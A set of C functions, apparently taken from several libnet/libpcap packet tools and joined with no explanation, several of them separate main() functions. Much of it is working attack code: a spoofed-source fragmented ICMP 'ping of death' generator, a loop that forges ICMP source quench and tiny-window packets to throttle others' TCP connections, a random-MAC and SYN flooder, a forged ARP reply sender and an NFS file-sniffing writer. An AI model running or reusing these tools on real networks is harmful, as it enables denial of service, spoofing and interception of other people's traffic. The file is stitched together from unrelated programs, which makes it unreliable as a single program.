void nfs_save(struct tuple4 *addr, struct myreadargs *ma, u_char *buf, int len) { int fd; warnx("%s.%d > %s.%d: %s (%d@%d)", libnet_host_lookup(addr->daddr, 0), addr->dest, libnet_host_lookup(addr->saddr, 0), addr->source, ma->filename, len, ma->offset); if ((fd = open(ma->filename, O_WRONLY|O_CREAT, 0644)) >= 0) { if (lseek(fd, ma->offset, SEEK_SET) == ma->offset) write(fd, buf, len); } close(fd); }
int main (int argc, char **argv) { unsigned long fakesrc, target; unsigned char *buf; unsigned char *data; int sock, i, flags, offset, len; if (argc != 2 || !(target = libnet_name_resolve(argv[1], 1))) { fprintf(stderr, "Usage: %s <target>\n", argv[0]); exit(1); } if ((sock = libnet_open_raw_sock(IPPROTO_RAW)) == -1) { perror("raw sock"); exit(1); } /* get random src addr. */ libnet_seed_prand(); fakesrc = libnet_get_prand(LIBNET_PRu32); buf = malloc(LIBNET_IP_H + LIBNET_ICMP_ECHO_H); data = (unsigned char *)malloc(FRAG_LEN); for (i = 0 ; i < 65536 ; i += (LIBNET_ICMP_ECHO_H + FRAG_LEN)) { offset = i; flags = 0; if (offset < 65120) { flags = IP_MF; len = FRAG_LEN; } else len = 410; /* for total reconstructed len of 65538 */ /* make IP header. */ libnet_build_ip(LIBNET_ICMP_ECHO_H + len, 0, 666, flags | (offset >> 3), 64, IPPROTO_ICMP, fakesrc, target, NULL, 0, buf); /* make ICMP packet. */ libnet_build_icmp_echo(8, 0, 666, 666, data, len, buf + LIBNET_IP_H); /* calculate ICMP checksum. */ libnet_do_checksum(buf, IPPROTO_ICMP, LIBNET_ICMP_ECHO_H + len); /* send it. */ libnet_write_ip(sock, buf, LIBNET_IP_H + LIBNET_ICMP_ECHO_H + len); /* tcpdump-style jonks. */ printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_host_lookup(fakesrc,0), argv[1], LIBNET_ICMP_ECHO_H + len, offset, flags ? "+" : ""); } free(buf); return (EXIT_SUCCESS); }
int libnet_do_arp(struct libnet_link_int *l, u_char *device, struct ether_addr *e, u_long ip) { int n, i; u_char *buf, errbuf[256], *packet, *ip_p; struct libnet_ethernet_hdr *p; struct libnet_arp_hdr *a; u_long local_ip; pcap_t *pd; struct pcap_pkthdr pc_hdr; /* * Initialize a packet. */ if (libnet_init_packet(LIBNET_ARP_H + LIBNET_ETH_H, &buf) == -1) { perror("libnet_init_packet memory:"); exit(EXIT_FAILURE); } /* * Get the ethernet address of the device. */ e = libnet_get_hwaddr(l, device, errbuf); if (e == NULL) { fprintf(stderr, "libnet_get_hwaddr: %s\n", errbuf); return (-1); } /* * Get the IP address of the device. */ local_ip = htonl(libnet_get_ipaddr(l, device, errbuf)); if (!local_ip) { fprintf(stderr, "libnet_get_ipaddr: %s\n", errbuf); return (-1); } /* * Open the pcap device. */ pd = pcap_open_live(device, LIBNET_ARP_H + LIBNET_ETH_H, 1, 500, errbuf); if (pd == NULL) { fprintf(stderr, "pcap_open_live: %s\n", errbuf); return (-1); } /* * Ethernet header */ libnet_build_ethernet( enet_dst, /* broadcast ethernet address */ e->ether_addr_octet, /* source ethernet address */ ETHERTYPE_ARP, /* this frame holds an ARP packet */ NULL, /* payload */ 0, /* payload size */ buf); /* packet header memory */ /* * ARP header */ libnet_build_arp( ARPHRD_ETHER, /* hardware address type */ ETHERTYPE_IP, /* protocol address type */ ETHER_ADDR_LEN, /* hardware address length */ 4, /* protocol address length */ ARPOP_REQUEST, /* packet type - ARP request */ e->ether_addr_octet, /* source (local) ethernet address */ (u_char *)&local_ip, /* source (local) IP address */ enet_dst, /* target's ethernet address (broadcast) */ (u_char *)&ip, /* target's IP address */ NULL, /* payload */ 0, /* payload size */ buf + LIBNET_ETH_H); /* packet header memory */ n = libnet_write_link_layer(l, device, buf, LIBNET_ARP_H + LIBNET_ETH_H); if (n == -1) { fprintf(stderr, "libnet_write_link_layer choked\n"); return (-1); } printf("Sent a %d byte ARP request looking for the MAC of %s.\n", n, libnet_host_lookup(ip, 0)); printf("Waiting for a response...\n"); for (;(packet = ((u_char *)pcap_next(pd, &pc_hdr)));) { p = (struct libnet_ethernet_hdr *)(packet); if (ntohs(p->ether_type) == ETHERTYPE_ARP) { a = (struct libnet_arp_hdr *)(packet + LIBNET_ETH_H); if (ntohs(a->ar_op) == ARPOP_REPLY) { ip_p = (u_char *)&ip; if (IP_UCHAR_COMP(a->ar_spa, ip_p)) { printf("Target hardware address: "); for (i = 0; i < 6; i++) { printf("%x", a->ar_sha[i]); if (i != 5) { printf(":"); } } printf("\n"); } } } } libnet_destroy_packet(&buf); return (n); }
int main(int argc, char *argv[]) { int c; char errbuf[256]; char *device = NULL; struct libnet_link_int *l; struct ether_addr *e; u_long i; while ((c = getopt(argc, argv, "i:")) != EOF) { switch (c) { case 'i': device = optarg; break; default: exit(EXIT_FAILURE); } } if (!device) { fprintf(stderr, "Specify a device\n"); exit(EXIT_FAILURE); } l = libnet_open_link_interface(device, errbuf); if (!l) { fprintf(stderr, "libnet_open_link_interface: %s\n", errbuf); exit(EXIT_FAILURE); } printf("Interface %s\n", device); e = libnet_get_hwaddr(l, device, errbuf); if (!e) { fprintf(stderr, "Can't get hardware address: %s\n", errbuf); exit(EXIT_FAILURE); } else { printf("MAC address: "); for (c = 0; c < 6; c++) { printf("%x", e->ether_addr_octet[c]); if (c != 5) { printf(":"); } } printf("\n"); } i = libnet_get_ipaddr(l, device, errbuf); if (!i) { fprintf(stderr, "Can't get ip address: %s\n", errbuf); exit(EXIT_FAILURE); } else { printf("IP address: "); printf("%s\n", libnet_host_lookup(ntohl(i), 0)); } exit(EXIT_SUCCESS); }
void tcp_nice_loop(pcap_t *pd, int sock) { struct pcap_pkthdr pkthdr; struct libnet_ip_hdr *ip; struct libnet_tcp_hdr *tcp; struct libnet_icmp_hdr *icmp; u_char *pkt, buf[IP_H + ICMP_ECHO_H + 128]; int len, nice; libnet_seed_prand(); nice = 160 / Opt_nice; for (;;) { if ((pkt = (char *)pcap_next(pd, &pkthdr)) != NULL) { ip = (struct libnet_ip_hdr *)(pkt + pcap_off); if (ip->ip_p != IPPROTO_TCP) continue; tcp = (struct libnet_tcp_hdr *) ((u_char *)ip + (ip->ip_hl * 4)); if (tcp->th_flags & (TH_SYN|TH_FIN|TH_RST) || ntohs(tcp->th_win) == nice) continue; if (Opt_icmp) { /* Send ICMP source quench. */ len = (ip->ip_hl * 4) + 8; libnet_build_ip(ICMP_ECHO_H + len, 0, libnet_get_prand(PRu16), 0, 64, IPPROTO_ICMP, ip->ip_dst.s_addr, ip->ip_src.s_addr, NULL, 0, buf); icmp = (struct libnet_icmp_hdr *)(buf + IP_H); icmp->icmp_type = 4; icmp->icmp_code = 0; memcpy((u_char *)icmp + ICMP_ECHO_H, (u_char *)ip, len); libnet_do_checksum(buf, IPPROTO_ICMP, ICMP_ECHO_H + len); len += (IP_H + ICMP_ECHO_H); if (libnet_write_ip(sock, buf, len) != len) warn("write"); fprintf(stderr, "%s > %s: icmp: source quench\n", libnet_host_lookup(ip->ip_dst.s_addr, 0), libnet_host_lookup(ip->ip_src.s_addr, 0)); } /* Send tiny window advertisement. */ ip->ip_hl = 5; ip->ip_len = htons(IP_H + TCP_H); ip->ip_id = libnet_get_prand(PRu16); memcpy(buf, (u_char *)ip, IP_H); tcp->th_off = 5; tcp->th_win = htons(nice); memcpy(buf + IP_H, (u_char *)tcp, TCP_H); libnet_do_checksum(buf, IPPROTO_TCP, TCP_H); len = IP_H + TCP_H; if (libnet_write_ip(sock, buf, len) != len) warn("write"); fprintf(stderr, "%s:%d > %s:%d: . ack %u win %d\n", libnet_host_lookup(ip->ip_src.s_addr, 0), ntohs(tcp->th_sport), libnet_host_lookup(ip->ip_dst.s_addr, 0), ntohs(tcp->th_dport), ntohl(tcp->th_ack), nice); } } }
int main(int argc, char *argv[]) { // packet type (arp/udp/tcp) char type[5]; // network device char *device = "eth0\0"; struct libnet_link_int *link; // Raw socket int sock; // error buffer char errbuff[LIBNET_ERRBUF_SIZE]; // src and dst mac u_char dmac[6],smac[6]; // src and dst ip unsigned int src_ip, dst_ip; // packet buffer unsigned char *packet; // packet payload char *payload; // payload size int p_size; // bytes send over the wire int send; // check parameter if(argc == 1) { printf("Usage: %s <arp/udp/tcp>\n",argv[0]); exit(0); } else { strcpy(type,argv[1]); } // Allocate memory for the payload payload = malloc(50); // Packets payload strcpy(payload,"TEST LIBNET\0"); packet = NULL; // payload size p_size = strlen(payload); // mac address strcpy(smac,SMAC); strcpy(dmac,DMAC); // ip address in network byte order src_ip = inet_addr(SOURCE); dst_ip = inet_addr(DEST); // Lookup ip addresses src_ip = libnet_name_resolve(libnet_host_lookup(src_ip,0),0); dst_ip = libnet_name_resolve(libnet_host_lookup(dst_ip,0),0); // Build an ARP packet? if(!strcmp(type,"arp")) { // open the network device link = libnet_open_link_interface(device,errbuff); // Failed? if(link == NULL) { printf("Error while opening device %s!\n%s\n",device,errbuff); exit(1); } printf("Using device %s\n",device); // Allocate memory for the packet if(libnet_init_packet(LIBNET_ETH_H+LIBNET_ARP_H+p_size,&packet) == -1) { printf("libnet_init_packet error!\n%s\n", strerror(errno)); exit(1); } if(packet == NULL) { printf("libnet_init_packet error!\n"); exit(1); } // Build ethernet header libnet_build_ethernet(dmac, // destination mac smac, // source mac ETHERTYPE_ARP,// ethernet packet type NULL, // pointer to payload 0, // payload size packet // pointer to packet buffer ); printf("Sending ARP reply packet %s --> %s\n",SOURCE,DEST); libnet_build_arp(ARPHRD_ETHER, // hardware type ETHERTYPE_IP, // protocol type ETHER_ADDR_LEN, // hardware address size 4, // protocol address size ARPOP_REPLY, // ARP operation smac, // source mac (u_char *)&src_ip, // source ip dmac, // destination mac (u_char *)&dst_ip, // destination ip NULL, // pointer to payload 0, // payload size packet+LIBNET_ETH_H // pointer to packet buffer ); // Get the packet on the wire send = libnet_write_link_layer(link,device,packet,LIBNET_ETH_H+LIBNET_IP_H+LIBNET_TCP_H+p_size); // was the complete packet send over the wire? if(send < LIBNET_IP_H+LIBNET_TCP_H+p_size) { printf("error while writing packet into the socket...\n"); } // close the network device libnet_close_link_interface(link); } else { // Open a raw sock sock = libnet_open_raw_sock(IPPROTO_RAW); // Allocate memory for the packet if(libnet_init_packet(LIBNET_IP_H+LIBNET_TCP_H+p_size,&packet) == -1) { printf("libnet_init_packet error!\n%s\n", strerror(errno)); exit(1); } // Build ip header libnet_build_ip(LIBNET_TCP_H+p_size,// packet length without ip header length 0, // ip type of service 242, // ip id 0, // fragmentation bit 48, // time to live IPPROTO_TCP, // Transport Control Protokoll src_ip, // source ip dst_ip, // destination ip NULL, // pointer to ip payload 0, // ip options packet // pointer to packet buffer ); // Build UDP packet? if(!strcmp(type,"udp")) { libnet_build_udp(ntohs(SPORT), // Source port ntohs(DPORT), // destination port payload, // pointer to packet payload p_size, // payload size packet+LIBNET_IP_H // pointer to packet buffer ); printf("Sending UDP packet %s:%d --> %s.%d\n",SOURCE,SPORT,DEST,DPORT); } // Build TCP/IP packet per default else { // Build tcp header libnet_build_tcp(ntohs(SPORT), // source port ntohs(DPORT), // destination port 1000000000, // acknowledge number 1000000000, // sequence number TH_ACK, // tcp flags 1024, // window size 0, // urgent pointer payload, // pointer to packet payload p_size, // payload size packet+LIBNET_IP_H // pointer to the packet buffer ); printf("Sending TCP packet %s:%d --> %s.%d\n",SOURCE,SPORT,DEST,DPORT); } // Calculize checksum libnet_do_checksum(packet,IPPROTO_TCP,LIBNET_IP_H+LIBNET_TCP_H+p_size); // Get the packet on the wire send = libnet_write_ip(sock,packet,LIBNET_IP_H+LIBNET_TCP_H+p_size); // was the complete packet send over the wire? if(send < LIBNET_IP_H+LIBNET_TCP_H+p_size) { printf("error while writing packet into the socket...\n"); } // close the socket libnet_close_raw_sock(sock); } // free the memory //libnet_destroy_packet(packet); free(payload); free(errbuff); return 1; }
int main(int argc, char **argv) { bpf_u_int32 mask, mask2; /* subnet mask */ bpf_u_int32 net, net2; /* ip */ char errbuf[PCAP_ERRBUF_SIZE]; /* error buffer */ pcap_t *handle; /* packet capture handle */ char filter_exp[] = "ip"; /* filter expression */ struct bpf_program fp; /* compiled filter program (expression) */ int c,num_packets = -1; /* number of packets to capture */ struct libnet_link_int *l; u_long i; /* check command-line options */ while ((c = getopt(argc, argv, "i:I:d:n:hpcf:")) != EOF) { switch (c) { case 'i': dev = optarg; dev2 = dev; break; case 'I': dev2 = optarg; break; case 'd': daddr2 = optarg; break; case 'n': num_packets = atoi(optarg); break; case 'f': strcpy(filter_exp, optarg); break; case 'h': hide_header = 1; break; case 'p': hide_payload = 1; break; case 'c': capture_only = 1; break; default: print_app_usage(argv[0]); exit(EXIT_FAILURE); } } if (dev == NULL) { print_app_usage(argv[0]); exit(EXIT_FAILURE); } /* get source ip address associated with forward device */ l = libnet_open_link_interface(dev2, errbuf); if (!l) { printf("libnet_open_link_interface: %s\n", errbuf); goto failure; } i = libnet_get_ipaddr(l, dev2, errbuf); if (!i) { printf("Can't get ip address: %s\n", errbuf); goto failure; } saddr2 = (char *)libnet_host_lookup(ntohl(i), 0); /* get network number and mask associated with capture device */ if (pcap_lookupnet(dev, &net, &mask, errbuf) == -1) { printf(" Error: couldn't get netmask for interface %s\n\n", errbuf); goto failure; } /* print capture info */ printf("\n Capture from: %s\n", dev); printf(" Forward to: %s\n", dev2); printf(" Src Address: %s\n", saddr2); if (daddr2) printf(" Dst Address: %s\n", daddr2); else printf(" Dst Address: Not changed\n"); if(num_packets > 0) printf("Packets to capture: %d\n", num_packets); printf("Packet Filter: %s\n", filter_exp); printf("\n"); /* open capture device */ handle = pcap_open_live(dev, SNAP_LEN, 1, 1000, errbuf); if (handle == NULL) { printf("\n Error: couldn't open interface %s: %s\n\n", dev, errbuf); goto failure; } /* make sure we're capturing on an Ethernet device */ if (pcap_datalink(handle) != DLT_EN10MB) { printf("\n Error: %s is not on ethernet\n\n", dev); goto failure; } /* compile the filter expression */ if (pcap_compile(handle, &fp, filter_exp, 0, net) == -1) { printf("\n Error: couldn't parse filter %s: %s\n\n", filter_exp, pcap_geterr(handle)); goto failure; } /* apply the compiled filter */ if (pcap_setfilter(handle, &fp) == -1) { printf("\n Error: couldn't install filter %s: %s\n\n", filter_exp, pcap_geterr(handle)); goto failure; } /* now we can set our callback function */ pcap_loop(handle, num_packets, got_packet, NULL); /* cleanup */ pcap_freecode(&fp); pcap_close(handle); printf("\nCapture and forward complete.\n\n"); exit(EXIT_SUCCESS); failure: exit(EXIT_FAILURE); }
int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c, i; struct libnet_link_int *llif; char ebuf[PCAP_ERRBUF_SIZE]; u_char sha[ETHER_ADDR_LEN], tha[ETHER_ADDR_LEN]; in_addr_t src, dst; u_short sport, dport; u_int32_t seq; u_char pkt[ETH_H + IP_H + TCP_H]; while ((c = getopt(argc, argv, "vs:d:e:x:y:i:n:h?V")) != -1) { switch (c) { case 'v': break; case 's': Src = libnet_name_resolve(optarg, 0); break; case 'd': Dst = libnet_name_resolve(optarg, 0); break; case 'e': Tha = (u_char *)ether_aton(optarg); break; case 'x': Sport = atoi(optarg); break; case 'y': Dport = atoi(optarg); break; case 'i': Intf = optarg; break; case 'n': Repeat = atoi(optarg); break; default: usage(); } } argc -= optind; argv += optind; if (argc != 0) usage(); if (!Intf && (Intf = pcap_lookupdev(ebuf)) == NULL) errx(1, "%s", ebuf); if ((llif = libnet_open_link_interface(Intf, ebuf)) == 0) errx(1, "%s", ebuf); libnet_seed_prand(); for (i = 0; i != Repeat; i++) { gen_mac(sha); if (Tha == NULL) gen_mac(tha); else memcpy(tha, Tha, sizeof(tha)); if (Src != 0) src = Src; else src = libnet_get_prand(PRu32); if (Dst != 0) dst = Dst; else dst = libnet_get_prand(PRu32); if (Sport != 0) sport = Sport; else sport = libnet_get_prand(PRu16); if (Dport != 0) dport = Dport; else dport = libnet_get_prand(PRu16); seq = libnet_get_prand(PRu32); libnet_build_ethernet(tha, sha, ETHERTYPE_IP, NULL, 0, pkt); libnet_build_ip(TCP_H, 0, libnet_get_prand(PRu16), 0, 64, IPPROTO_TCP, src, dst, NULL, 0, pkt + ETH_H); libnet_build_tcp(sport, dport, seq, 0, TH_SYN, 512, 0, NULL, 0, pkt + ETH_H + IP_H); libnet_do_checksum(pkt + ETH_H, IPPROTO_IP, IP_H); libnet_do_checksum(pkt + ETH_H, IPPROTO_TCP, TCP_H); if (libnet_write_link_layer(llif, Intf, pkt, sizeof(pkt)) < 0) errx(1, "write"); fprintf(stderr, "%s ", ether_ntoa((struct ether_addr *)sha)); fprintf(stderr, "%s %s.%d > %s.%d: S %u:%u(0) win 512\n", ether_ntoa((struct ether_addr *)tha), libnet_host_lookup(Src, 0), sport, libnet_host_lookup(Dst, 0), dport, seq, seq); } exit(0); }